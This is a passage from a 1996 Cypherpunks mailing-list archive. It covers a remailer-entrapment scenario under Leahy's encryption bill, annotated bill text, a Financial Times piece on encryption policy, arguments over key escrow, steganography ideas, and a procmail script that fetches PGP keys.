One day, Leahy's bill passes, as described by VTW (and quoted by Peterson):


  "§2804. Unlawful use of encryption to obstruct justice"    
   "Whoever willfully endeavors by means of encryption to obstruct,   
   impede, or prevent the communication of information in furtherance 
   to a felony which may be prosecuted in a court of the United States, 
   to an investigative or law enforcement officer shall-..."

I am assuming they fix the obvious error in the phrasing above.  

"Bob," the operator of the encrypted remailer, receives an email one day 
which states something like:

"Thanks for the use of your nifty anonymous remailer.  Under a different 
name, I intend to use this remailer (along with others) to transmit child 
pornography, plot terrorism, and do all of my drug deals.  You've made my 
life so much more secure!"

Bob, alarmed at this note, tries to cover his ass by sending back a message 
asking this person to not do anything illegal on his machine, hoping that 
this will protect himself. The response is "as long as the system operates, 
it will be used for whatever I want!"

 What "Bob" doesn't realize is that the message came from an agent for the 
cops, who now have proof that he is aware that his system will be regularly 
used for illegal purposes.  If "Bob" is smart enough, he will realize his 
quandary, and he has only two choices:

1.  Shut the remailer down to prevent such use.

2.  Continue to run the remailer, knowing that it is being used for 
illegalities.

If he should choose the latter, the cops merely have their agent mail some 
kid some child pornography, and use Bob's remailer as the last link in the 
chain.   At that point, the "investigation" starts.  The cops approach 
"Bob," and insist that he tell them from where the message came.  Naturally, 
however, "Bob" is an honest fellow, and he runs a remailer that doesn't keep 
records.

At that point, Bob is GUILTY of violation of the Leahy bill, because his 
encrypted anonymous remailer:

1.  Uses encryption to thwart message tracing, and thus the "criminal 
investigation."

2.  Bob has already been informed that his system will be used for illegal 
purposes; the cops have the messages to prove he has been told.  He's GUILTY 
GUILTY GUILTY, he will definitely lose the system and possibly whatever 
residence it runs in, and will probably have to pay a huge fine to boot. 

Now, you may not sympathize with Bob. This doesn't affect YOU, right?  
RIGHT?!?   But let's suppose the cops offer him a DEAL!  "Spy for us, keep 
records and forward each and every one of them to us, and we won't prosecute 
you!"   Such a deal!

At that point, even an idiot begins to see the problem:  Suddenly, you can 
no longer trust ANY anonymous remailer, because the operator might have been 
"stung" already, and he's keeping his system up only to keep his house and 
life savings.  One by one, each encrypted anonymous remailer is dealt the 
same treatment, and pretty soon you can't trust any of them.  All the 
systems run by honest, uncoerced people will go down.  Naturally, this 
treatment will occur in every country that sites anonymous remailers.

So maybe the word gets out, occasionally.  At that point, usage of anonymous 
remailers declines, and people willing to risk operating one declines.  A 
few come up which are run by the Feds, which log anyone who  attempts to use 
it...

Or am I the only person who can see this, huh?  If anybody doubts this 
scenario, I challenge you to tell me WHY it cannot happen.  I am, frankly, 
astonished at anybody who did not immediately see the potential downside to 
this portion of the bill!


Jim Bell, Pessimist and proud of it.

Klaatu Burada Nikto





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: <cwalton@jovanet.com>
Date: Fri, 8 Mar 1996 15:21:51 +0800
To: <cypherpunks@toad.com>
Subject: remailers, govmnts, and the Co$
Message-ID: <9603070107.AA10247@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


It's one thing that the government runs remailers and they're just really 
not nice for doing that and all, but what about other 
people/organizations? 

I applied for a job at Earthlink in Los Angeles last year, around may or 
june. they had been small ISP, but growing fast. they were established by 
a 24(?) yr old wizz kid named Sky about july or so of 1994 and were 
hiring. they had given me great service aand i was excited about getting 
into 'the business'. I went for an interview and talked with the 3 VPs at 
the time. I did not talk to sky, the owner. first guy tells me they are 
running the biz based on the principles of the church of scientology. 
humm.. hands me a huge book published by them. i read the inscription in 
the front. "To Sky, happy birthday, love dad". this guy says he's in the 
Co$. I talk to the next 2 guys. they have been hired from all over the 
country, moved out here and they both tell me they are in the Co$ too. 
all 3 VP and the "owner" are tied into the Co$. i turned down their offer 
and got another ISP. 

I thot back. the thing with anon.penet in finland and the Co$ had been a 
couple months before Earthlink started into business. I have watched them 
grow incccedibly fast with a huge advertising budget. Read a Wired 
magazine or any other computer mag. they're advertising in it. they've 
gone national. they're everywhere. 

Does Earthlink exist as a reaction to the net controversy and the Co$? I 
donno. Are they really owned by the Co$? I donno. Does the Co$ have 
access to all the mail that comes across their servers? i donno. Am I 
gonna get sued because of this note? I donno.

are you listening? 


Conrad Walton                           
http://www.industrial-artworks.com/
---------------------------------------------------------------------------
---
 INDUSTRIAL ARTWORKS  |  POB 2815, El Segundo, CA 90245  |  1-310-640-3365





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: uunet!in2.uu.net!gatech!newsfeed.internetmci.com!lamarck.sura.net!mother.usf.edu!luna!panagopo@warwick.com
Date: Fri, 8 Mar 1996 01:35:34 +0800
To: cypherpunks@toad.com
Subject: Re: Your Mama's so......
In-Reply-To: <312BF238.4F69@tyrell.net>
Message-ID: <Pine.SUN.3.91.960306171111.15441A-100000@luna>
MIME-Version: 1.0
Content-Type: text/plain


aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaak




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Fri, 8 Mar 1996 01:36:42 +0800
To: cypherpunks@toad.com
Subject: Re: Jump Start ecash With IPhone
Message-ID: <2.2.32.19960306221919.00727068@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 11:37 AM 3/6/96 -0800, Jim McCoy wrote:
>On another related note the IRS is getting somewhat concerned
>about the opportunities the Internet offers people to avoid taxes
>according to the Treasury department's international-tax counsel. The
>government will "maintain [tax] toll booths on the information superhighway."
>(WSJ, 3/6/96)

The note in the WSJ's regular Wednesday "Tax Report" column specified that
the IRS was most concerned about the possibility that electronic payment
systems could lead to "extensive transactions outside of normal banking
channels."

As well they might worry.  "When money is data, data switches are money
switches."

Talking about toll booths is easier than erecting them on a system built by
consensus.  I can see the ETF meeting when the Service presents its proposal.

And as for those who say that the ETF will be replaced by the 'Big Boys' now
that the Net is a hot item, I say so what.  We can have our own net running
on any infrastructure.  What counts is how many hosts run the protocols not
who wrote the protocols.  

And how successful will the Service be in convincing lots of hosts to run
its new and improved Simple Tax Collection Protocol (STCP)?

DCF





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: owner-cypherpunks@toad.com
Date: Thu, 7 Mar 1996 06:52:33 +0800
Subject: No Subject
Message-ID: <QQafxp15094.199603062223@relay3.UU.NET>
MIME-Version: 1.0
Content-Type: text/plain



Note: downloaded from www.vtw.org so cannot guarentee correctness-

  "§2804. Unlawful use of encryption to obstruct justice"    
   "Whoever willfully endeavors by means of encryption to obstruct,   
   impede, or prevent the communication of information in furtherance 
   to a felony which may be prosecuted in a court of the United States, 
   to an investigative or law enforcement officer shall-..."

Interesting wording - sounds almost like if you impede the *commission* of 
a felony, you is been had. Keyword would seem to be "willingly". Suspect
they meant to say "...obstruct (etc) the investigation of a felony..."

  "(b) CONTROL OF EXPORTS BY SECRETARY OF COMMERCE.-
     "(1) GENERAL RULE.-Notwithstanding any other law, subject to
      paragraphs (2), (3), and (4), the Secretary of Commerce shall have  
      exclusive authority to control exports of all computer hardware,
      software, and technology for information security (including
      encryption), except computer hardware, software, and technology that    
      is specifically designed or modified for military use, including
      command, control, and intelligence applications.     

This would seem to extend ITAR, not limit it.

     "(2) ITEMS NOT REQUIRING LICENSES.-No validated license may be
      required, except pursuant to the Trading With The Enemy Act or the
      International Emergency Economic Powers Act (but only to the extent
      that the authority of such Act is not exercised to extend controls
      imposed under this Act), for the export or reexport of- 
      "(A) any software, including software with encryption capabilities, 
       that is- "(i) generally available, as is, and designed for 
                 installation by the purchaser; or
               "(ii) in the public domain or publicly available because 
                 it is generally accessible to the interested public in 
                 any form; or
      "(B) any computing device solely because it incorporates or employs 
       in any form software (including software with encryption 
       capabilities) exempted from any requirement for a validated license 
       under subparagraph (A). 

Microsoft's CryptoAPI seems OK. PGP would seem to fall under both (i) 
and (ii).

     "(3) SOFTWARE WITH ENCRYPTION CAPABILITIES.-The Secretary of Commerce 
      shall authorize the export or reexport of software with encryption 
      capabilities for nonmilitary end-uses in any country to which exports 
      of software of similar capability are permitted for use by financial 
      institutions not controlled in fact by United States persons, unless 
      there is substantial evidence that such software will be-
       "(A) diverted to a military end-use or an end-use supporting 
        international terrorism;
       "(B) modified for military or terrorist end-use; or     
       "(C) reexported without requisite United States authorization.

Thank you MasterCard/VISA for SET. Note that it does not seem to say that
you do not need a license, just that one shall not be witheld without
"substantial evidence".

      "(4) HARDWARE WITH ENCRYPTION CAPABILITIES.-The Secretary shall 
        authorize the export or reexport of computer hardware with 
        encryption capabilities if the Secretary determines that a product 
        offering comparable security is commercially available from a 
        foreign supplier without effective restrictions outside the United 
        States.     
 
Same comment except that token & INE vendors will have to demonstrate that 
a foreign competitor exists.

Real lawyers please comment.
					Warmly,
						Padgett




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: owner-cypherpunks@toad.com
Date: Thu, 7 Mar 1996 06:50:53 +0800
Subject: No Subject
Message-ID: <QQafxp15141.199603062224@relay3.UU.NET>
MIME-Version: 1.0
Content-Type: text/plain


   Financial Times, March 6, 1996, IT Section, p. V. 
 
 
   Network Security: Operating under a cloud of uncertainty 
 
      Companies face a complex web of technical, legal and 
      moral questions 
 
 
   The IT security threat has long been depicted in terms of 
   wild-eyed hackers hunched over terminals late into the 
   night. But while there is real cause for concern about 
   criminal activity over computer networks, large 
   corporations are very worried about another threat to their 
   use of electronic communications. 
 
   Meanwhile, government restrictions on the use of data 
   encryption codes in various countries are limiting the 
   ability of commercial organisations to protect themselves. 
 
   Cryptography is at the heart of this dilemma. Governments 
   all over the world rely on specialist intelligence units to 
   break down data transmissions from other nations and 
   individuals while encrypting their own messages. 
 
   The US National Security Agency and the UK's Government 
   Communications HQ are the best-known of these agencies. 
 
   The NSA is notorious for obsessive secrecy. Meanwhile, in 
   the UK, the GCHQ has lifted its traditional reticence in 
   recent years to offer advice to British companies concerned 
   with data security. 
 
   Mr Roger James, chairman of Cheshire-based communications 
   software specialist Boldon James, has worked with GCHQ to 
   define data standards for UK government departments. Mr 
   James plays down the cloak-and-dagger imagine of GCHQ, but 
   instead he describes his contact with its staff as 
   "horribly technical". He also portrays the Cheltenham 
   code-breakers as "very down-to-earth people". 
 
   There are two ways of looking at security, he says "one is 
   the practical approach, which means accepting that perfect 
   security is impossible to obtain. The other is the Ivory 
   Tower approach, which involves dreaming of a world in which 
   security is absolute. There are a lot of 'practicalists' in 
   GCHQ". 
 
   Mr James, whose clients include the Britannia Building 
   Society and the German Navy, is active in the European 
   Electronic Messaging Association. He is concerned at the 
   lack of a co-ordinated European policy on encryption. And 
   he fears that effective security measures could become 
   illegal with the advent of future legislation curbing the 
   availability of encryption software. 
 
   It is illegal at the moment to use strong cryptography 
   techniques in France without first depositing the key to 
   unlocking your codes with the French government. UK 
   companies developing sophisticated security programs find 
   their software classified as munitions and subject to tight 
   export restrictions, even within the EC. 
 
   In the US, the author of strong encryption program, called 
   'Pretty Good Privacy', found himself facing a Grand Jury 
   and possible charges of exporting prohibited technology. 
   The NSA has proposed that all personal computers made in 
   the US contain the Clipper Chip. This security feature 
   would give easy access to any data communications, however 
   the user chose to encode it. The proposal is currently 
   stalled, having met with ferocious opposition. 
 
   Both suppliers of information technology and industry at 
   large need to clear a path through this international maze. 
   The legal structure surrounding the use of encryption 
   technology is of particular concern to anyone working in 
   electronic commerce. 
 
   "The Clipper Chip debate raised a fundamental moral issue," 
   says Mr James. "Software technology means that strong 
   encryption, previously available only to the military, can 
   now be obtained by the public. If governments then find 
   messages hard to break, it leads immediately to a conflict 
   of interest." 
 
   One company that has confronted this apparent conflict of 
   interest between state and commerce, with its attendant 
   uncertainty, is the Anglo-Dutch oil giant, Shell. Mr Nick 
   Mansfield, a Shell technical consultant specialising in 
   information security, says the company is enthusiastic 
   about the potential for eliminating paperwork across its 
   sprawling global operations -- "we are committed to 
   electronic trading," he says. "We have a vast 
   electronic-mail network. But there is still a section of 
   our business where we have to use paper". 
 
   Contract agreements are at issue here. Until security can 
   be absolutely guaranteed, bilateral agreements must be seen 
   to be tamper-proofed. Shell is about to deploy technology 
   to secure personal computers and PC servers across the 
   world. This e-mail security system will cost around L1m in 
   software purchasing plus L100,000 a year to run. It will 
   have 4,000 users. 
 
   Far from escalating costs, Mr Mansfield explains that 
   expenses are falling as security improves. Shell used to 
   run a secure telex network that cost L4m in technology and 
   required L200,000 a year to support 120 sites. This was 
   superseded by a secure fax network costing L1m in systems, 
   plus L100,000 in annual maintenance for 200 sites. The 
   latest system will expand secure messaging beyond the fax 
   network's remit. 
 
   But setting up this security system involved Shell in a 
   long and involved process. Its chosen security software is 
   subject to close scrutiny by the UK authorities, who worked 
   with Shell to customise the program before it could be 
   released for use overseas. 
 
   While Mr Mansfield is pleased that Shell's security system 
   is so strong, it required an export licence and he echoes 
   the concerns of EEMA's Mr James -- "it's a cart and horse 
   situation. Until governments agree on policy and relax some 
   restrictions, industry won't be encouraged to development 
   extreme standards of encryption". 
 
   There needs to be a broad European debate on this issue. 
   Until this complex web of technical, legal and moral 
   questions are resolved, secure commercial data networks 
   will be operating under a cloud of uncertainty. 
 
   Michael Dempsey 
 
   [End] 
 
   Note: Shell's Nick Mansfield was a speaker at the OECD 
   cryptography conference in Paris in December. 
 
   This issue of FT includes a 22-page special section on 
   Information Technology. 
 
 
 
 
 
 
 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: uunet!in1.uu.net!news2.cais.com!news.cais.net!nntp.uio.no!solace!news.ifm.liu.se!usenet@warwick.com
Date: Fri, 8 Mar 1996 01:36:21 +0800
To: cypherpunks@toad.com
Subject: Re: PLEASE REPLY!!
In-Reply-To: <4hkdsc$fvd@jade.emeraldis.com>
Message-ID: <313DC109.EAE@lysator.liu.se>
MIME-Version: 1.0
Content-Type: text/plain


David G. Cannon wrote:
> 
> Did this message make it out to the "real" world?? Please reply to this message
> if it did. Thankyou.
> 
> *David*


Yes it did!!

Have a nice day / Walle




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: droelke@rdxsunhost.aud.alcatel.com (Daniel R. Oelke)
Date: Mon, 11 Mar 1996 06:22:40 +0800
To: cypherpunks@toad.com
Subject: Re: Boycott "Applied Cryptography" and AT&T and RSA
Message-ID: <9603062351.AA12913@spirit.aud.alcatel.com>
MIME-Version: 1.0
Content-Type: text/plain



>
> Bruce Schnier (Author of applied cryptography) and Matt Blaze (Who
> is a crypto bigwig at at&t) have made it clear that they support
> key escrow. Both have written letters in favor of the new crypto
> law, it creates a key escrow system and also other restricts on
> crypto. The letters are on the CDT homepage and i think were
> posted here.
>
> WHAT THE FUCK??????????????????????????????????????????
>
> EFF, EPIC, VTW and almost everyone else (except for Bizdos at RSA, hmmmm)
> have all come out against this piece of shit. But with these so called
> experts baking it it could pass anyway.
>
 
Put your 2 brain cells together and think for a minute.
 
If you read the stuff - you can see that the bill talks about
key-escrow, BUT you can escrow the key with yourself if
you so desire.  It also does not put up any mandates for
key-escrow requirements in encryption systems.
The bill also will force relaxation of the export restrictions.
 
I hope - you could read and understand that 5 line "executive"
summary.
 
Dan
 
------------------------------------------------------------------
Dan Oelke                                  Alcatel Network Systems
droelke@aud.alcatel.com                             Richardson, TX





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ben Holiday <ncognito@gate.net>
Date: Fri, 8 Mar 1996 01:37:23 +0800
To: cypherpunks@toad.com
Subject: Re: Steganography idea: CU-SeeMe
In-Reply-To: <199603061134.MAA17301@utopia.hacktic.nl>
Message-ID: <Pine.A32.3.91.960306173520.65536B-100000@hopi.gate.net>
MIME-Version: 1.0
Content-Type: text/plain




On Wed, 6 Mar 1996, Anonymous wrote:

> On Wed, 6 Mar 1996, Nelson Minar wrote:
> 
> [Re: data steams to put steno in]
> > So here's one idea I've had as a place to hide a channel: network
> > video, in particular CU-SeeMe video streams. CU-SeeMe is a lowtech
> 
> That's an excellent idea.
> 

[lots of snippage]

Another problem is that in order to get a decent frame-rate CU-SeeMe does 
some image editing of its own: selectively sending only the portions of 
an image that have changed (I.e. the portion of the image that is a 
person who is moving is sent, The bookshelves in the background are not.) 
This could probably be easily gotten around however. 

This seems like a decent idea, however, once the initial obstacles have 
been overcome.. one typical problem with steg is the small number of bits 
that can be hidden.. i beleive a ratio of 1k per 100k is typical. Far too 
small to be useful for most people. Over the course of an hour long 
CU-SeeMe session however you could easily move enough data back and forth 
to provide adequate cover for a reasonablly long bit of cyphertext. 

As long as we're on the subject of stego, has anyone 
discussed/implemented subliminal streams in raw TCP packets? Seems 
possible to do at least on a point to point basis. If you could stash 
your data in the tcp packet itself, it wouldnt matter much what was 
actually being sent across the link. Some possibilities: a telnet client 
with a stegometer that would count the number of hidden bits remaining to 
be sent.. chat clients similarly equiped, etc. Then you could start up 
any client you choose and send data across it until you had gotten enough 
bits to complete transmission of your stego'd file.. just a thought.. ;)



Benji..





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: owner-cypherpunks@toad.com
Date: Thu, 7 Mar 1996 07:22:16 +0800
Subject: No Subject
Message-ID: <QQafxr19440.199603062255@relay3.UU.NET>
MIME-Version: 1.0
Content-Type: text/plain


David Lesher wrote:

| How about code that goes out & fetches keys upon demand, al-la DNS?

This works with procmail to get keys for all mail I receive.  I
discovered the problem is your keyrings get unmanageably large when
you do this.



# auto key retreival
#
# I have an elm alias, pgp, points to a keyserver

:0BW
* -----BEGIN PGP
*!^FROM_DAEMON
KEYID=|/home/adam/bin/sender_unknown

:0 ahc	# added h 8 jan 95
* ! ^X-Loop: Adams akr
| formail -a"X-Loop: Adams akr" |elm -s"mget $KEYID" pgp

# add the incoming keys to the ring

:0
* From bal@swissnet.ai.mit.edu
{
   # if we accidentally get the whole thing.
   :0 h
   * >10000
   /dev/null

   :0 h
   *^Subject:.*no keys match
   /dev/null

   :0:
   *Subject: Your command, ADD
   $DEFAULT


   :0E
   | pgp +batchmode -fka
}

sender_unknown:
#!/bin/sh
# unknown returns a keyid, exits 1 if the key is known
# $output is to get the exit status. Othierwise, this would be a one
liner.
OUTPUT=`pgp -f +VERBOSE=0 +batchmode  -o /dev/null`
echo $OUTPUT | egrep -s 'not found in file'
EV=$? 
if [ $EV -eq 0 ]; then 
        echo $OUTPUT | awk '{print $6}' 
fi
exit $EV


-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: owner-cypherpunks@toad.com
Date: Thu, 7 Mar 1996 07:34:48 +0800
Subject: No Subject
Message-ID: <QQafxr19534.199603062255@relay3.UU.NET>
MIME-Version: 1.0
Content-Type: text/plain


Post Test
-- 

John G. Jones
Director, Computer Services UTDS, Inc.
<http://www.utech.net>  <mailto:john@utech.net>
1593 E. Chestnut
Lompoc, CA  93436 
(805) 735-4447




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Thu, 7 Mar 1996 13:59:45 +0800
To: cypherpunks@toad.com
Subject: Re: Boycott "Applied Cryptography" and AT&T and RSA
In-Reply-To: <199603062058.MAA28987@jobe.shell.portal.com>
Message-ID: <199603062302.SAA09771@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



anonymous-remailer@shell.portal.com writes:
> Bruce Schnier (Author of applied cryptography) and Matt Blaze (Who
> is a crypto bigwig at at&t) have made it clear that they support
> key escrow.

Not again. Could this guy please find a nice crowbar with which to pry
his head out of the dark orafice he has stuck it in to?

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: uunet!in2.uu.net!gatech!purdue!haven.umd.edu!hecate.umd.edu!not-for-mail@warwick.com (David J. Murphy)
Date: Thu, 7 Mar 1996 14:51:38 +0800
To: cypherpunks@toad.com
Subject: testing 1 2 3 v1.0
Message-ID: <4hl5tn$6f6@wolfe.umd.edu>
MIME-Version: 1.0
Content-Type: text/plain


This is a test. This is only a test.

-- 
   David J. Murphy                         for now: eg392@umd5.umd.edu
            Remember, only YOU can prevent fire drills!




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: owner-cypherpunks@toad.com
Date: Thu, 7 Mar 1996 07:39:29 +0800
Subject: No Subject
Message-ID: <QQafxt22906.199603062316@relay3.UU.NET>
MIME-Version: 1.0
Content-Type: text/plain


> This is a test...


Follow up on test...test...test

--
Live on the edge, push the limits, and go EXTREME...
--------------------------------------------------------------------------
Svein Ove Solsvik          *  E-Mail:                 sveinove@ringnett.no

-Dyslexic atheists don't believe in Dog.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ernest Hua <hua@chromatic.com>
Date: Thu, 7 Mar 1996 16:23:46 +0800
To: cypherpunks@toad.com
Subject: FCC and Internet telephones
Message-ID: <9603070216.AA13123@krypton.chromatic.com>
MIME-Version: 1.0
Content-Type: text/plain



Dost my ears deceive me?  Is this true?

Ern

-------- INCLUDED MESSAGE

  FCC Asked to Stop Net Phones   

  A trade association of long distance phone service carriers has asked the 
Federal Communications Commission to halt companies from selling software and 
hardware products that enable use of the Internet for long distance voice 
services.
  In a statement from Washington, the America's Carriers Telecommunication 
Association says it "submits that it is incumbent upon the FCC to exercise 
jurisdiction over the use of the Internet for unregulated interstate and 
international telecommunications services."
  A growing number of companies sell such software with ancillary hardware for 
transmitting and receiving voice over the Net, which, says the statement, 
"creates the ability to 'by-pass' local, long distance and international 
carriers and allows for calls to be made for virtually 'no cost.'"
  "For example," adds the ACTA statement, "online service providers generally 
charge users around $10 for five hours of access and then around $3 for each 
additional hour. Five hours equals 300 minutes, divided by $10 is 3.3 cents 
per 
minute. The average residential long distance telephone call costs about 22 
cents per minute or seven times as much."
  Long-distance and international telephone service carriers must be approved 
by  the FCC to operate and must file tariffs before both the FCC and state 
public service commissions. All of these requirements are stipulated in the 
Communications Act of 1934 and the Telecommunications Act of 1996.
  Says ACTA, "Technology may once again be surpassing government's ability to 
control its proper use. However, the misuse of the Internet as a way to 
'by-pass' the traditional means of obtaining long distance service could 
result 
in a significant reduction of the Internet's ability to transport its ever 
enlarging amount of data traffic."
  Specifically, ACTA petitions the FCC to define the type of permissible 
communications that may be effected over the Internet.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alano@teleport.com>
Date: Mon, 11 Mar 1996 06:21:17 +0800
To: cypherpunks@toad.com
Subject: Re: Boycott "Applied Cryptography" and AT&T and RSA
Message-ID: <2.2.32.19960307022620.008f307c@mail.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


At 01:40 PM 3/6/96 -0800, anonymous-remailer@shell.portal.com wrote:
>Bruce Schnier (Author of applied cryptography) and Matt Blaze (Who
>is a crypto bigwig at at&t) have made it clear that they support
>key escrow. Both have written letters in favor of the new crypto
>law, it creates a key escrow system and also other restricts on
>crypto. The letters are on the CDT homepage and i think were
>posted here.

They support a bill which is aimed at easing the restrictions for the uses
of cryptography.  Judging from what I have read from their positions, they
view the bills as having more positive effects than negative effects.
(Which may or may not be true...)

>WHAT THE FUCK??????????????????????????????????????????

Sudden capslock stickage?

>EFF, EPIC, VTW and almost everyone else (except for Bizdos at RSA, hmmmm)
>have all come out against this piece of shit. But with these so called
>experts baking it it could pass anyway.

I think that you are infering evil intent where there is no evidence of
same.  The bill does have some major flaws, but it also has some major
advantages.  Being the cynic that I am, I think that the "use of crypto in a
crime" provisions are a big negative.  Others are not nearly as cynical however.

>Maybe the ltrs are a forgery? We should ask them, and if this is true, LETS
>SEND THEM A MESSAGE!!!!!!!! SWITCH YOUR PHONE SERVICE AND TELL AT&T WHY!!!
>STOP RECOMMENDING APPLIED CRYPTO (THERE ARE EASIER BOOKS ANYWAY). DEMAND
>THAT THESE PEOPLE STOP GIVING AWAY YOUR RIGHTS!!!!!!!!!!!!!!!!!!!!!!!!!!!

Posting in all caps will not help you convince people of the correctness of
your position.  Claiming conspiracys involving people who have better
reputations for supporting crypto than yourself will not help either.

If I were to charge people with complicity in conspiracy, yours would be one
of the first in line.  (Though a pretty lame one at that...  Trying to smear
people who have actual reputations with juvinile assertions and b1ff style
postings is not the way to win the hearts and minds of the Cypherpunks(tm).)

BTW, good luck in trying to boycott AT&T.  They own alot more than you can
imagine.  "You Will!  And the people to make you do it -- AT&T!"

|   Remember: Life is not always champagne. Sometimes it is REAL pain.   |
|"The moral PGP Diffie taught Zimmermann unites all| Disclaimer:         |
| mankind free in one-key-steganography-privacy!"  | Ignore the man      |
|`finger -l alano@teleport.com` for PGP 2.6.2 key  | behind the keyboard.|
|         http://www.teleport.com/~alano/          | alano@teleport.com  |





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: uunet!in2.uu.net!news.sprintlink.net!news.rain.org!sandy.sandpiper.com!usenet@warwick.com
Date: Thu, 7 Mar 1996 09:33:43 +0800
To: cypherpunks@toad.com
Subject: This is a test..no reply
Message-ID: <4hkldh$ov7@sandy.sandpiper.com>
MIME-Version: 1.0
Content-Type: text/plain


This is just a test...please do not reply






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: owner-cypherpunks@toad.com
Date: Thu, 7 Mar 1996 07:57:56 +0800
Subject: No Subject
Message-ID: <QQafxu25257.199603062333@relay3.UU.NET>
MIME-Version: 1.0
Content-Type: text/plain


> In the "real world" there is nothing to prevent someone from forging
> your real signature on a check or document or from disguising themselves
> as you and taking your place at an important business meeting.  The
> digital equivalents can be slightly more secure, but nothing is ever
> perfect.
> 
> jim
> 
Heh.  Whoops.  I may be a beginner but I'm not THAT green.  I shoulda 
known better than to use that exact wording.  Please excuse the 
inappropriate wording, all.

							Sincerely.
							Quentin Holte.
							( aka Charles Choi. ) 
							
							You are all the Buddha.
								- Last words
								  of Buddha.

							If you see the Buddha,
                                            		             kill him.
                                                                - Zen proverb.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: uunet!in2.uu.net!newsfeed.internetmci.com!lamarck.sura.net!rs7.loc.gov!news@warwick.com
Date: Thu, 7 Mar 1996 09:15:01 +0800
To: cypherpunks@toad.com
Subject: did this get out?
Message-ID: <4hkmso$p9b@rs7.loc.gov>
MIME-Version: 1.0
Content-Type: text/plain


   Is this getting past news.loc.gov?

   These opinions are my own, not those of the Library of 
Congress.

                                             Howard Sanner
                                             hcs@hsan.loc.gov
                                             sanner@mail.loc.gov





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mark M." <markm@voicenet.com>
Date: Thu, 7 Mar 1996 14:52:10 +0800
To: cypherpunks@toad.com
Subject: Re: Signature
In-Reply-To: <Pine.SUN.3.91.960305200146.11469A-100000@virtu>
Message-ID: <Pine.LNX.3.91.960306184805.1174A-100000@gak>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Tue, 5 Mar 1996, Charles Choi (SAR) wrote:

> 1)	Is it possible to base a privacy key ( e.g. PGP ) on a fractal 
> 		equation, instead of an algorithm based on two primes?  
> 		This would allow for an eternal level of complexity due 
> 		to infinite field of depth one can find as one 'zooms in' 
> 		closer ( correct me because I'm wrong; I'm not a math major,
> 		although increasingly I wish I was... ), allowing for near
> 		unbreakable privacy of information.

The fact that the private key is based on fractals rather than prime numbers
really doesn't make a difference.  Fractals are not random, and do in fact,
have a pattern.  The Mandelbrot Set, for instance, can be expressed in a
few bytes of information even though it is infinitely complex.  Therefore,
the fractal has extremely low entropy making it a bad choice from which to
obtain random data.

- --Mark

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
markm@voicenet.com              | finger -l for PGP key 0xf9b22ba5
http://www.voicenet.com/~markm/ | bd24d08e3cbb53472054fa56002258d5
"The concept of normalcy is just a conspiracy of the majority" -me


-----BEGIN PGP SIGNATURE-----
Version: 2.6.3
Charset: noconv

iQCVAwUBMT4ljbZc+sv5siulAQF15gP/St6B3vkSWbyjtEZOhQmChDi2yZsZFgRv
sQgpo0+k9Blg085J5FZGrHqKIvOSp2ylU9bjto77tnzaXd5e/d0i23/IS1g8yeR+
OotFKwXa0oFpNEXrVBKAgSJKgpngKaVEjBpkNZYeqOscsccLR09CeUVrfMn/+YjQ
4ywYjaf9Q1k=
=DQxa
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: uunet!in2.uu.net!newsfeed.internetmci.com!news.sprintlink.net!news.rain.org!sandy.sandpiper.com!usenet@warwick.com
Date: Fri, 8 Mar 1996 23:18:33 +0800
To: cypherpunks@toad.com
Subject: This is another test....no reply
Message-ID: <4hknhn$r2h@sandy.sandpiper.com>
MIME-Version: 1.0
Content-Type: text/plain


This is my 2nd test...please do not reply





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@lighthouse.homeport.org>
Date: Sun, 10 Mar 1996 22:58:27 +0800
To: mccoy@communities.com (Jim McCoy)
Subject: Re: Jump Start ecash With IPhone
In-Reply-To: <v02140b00ad6326a515a9@[199.2.22.124]>
Message-ID: <199603070006.TAA18662@homeport.org>
MIME-Version: 1.0
Content-Type: text


Jim McCoy wrote:
| Two problems:
| 
|         1- Chaum did not have the clue to pick up on this when two
|            cypherpunks (who shall remain nameless...) pitched this
|            and several other ideas to involve ISPs in jump-starting
|            ecash almost two years ago, so why would he figure it out
|            now?

	But now we don't need no stinkin' license.  We just use Mark
Twain ecash.  

	The big problem with this is that net phones can be subject to
delay & drop out, and I don't want to deal with that when I'm talking
on the phone.

Adam

-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "A. Padgett Peterson P.E. Information Security" <PADGETT@hobbes.orl.mmc.com>
Date: Thu, 7 Mar 1996 14:09:41 +0800
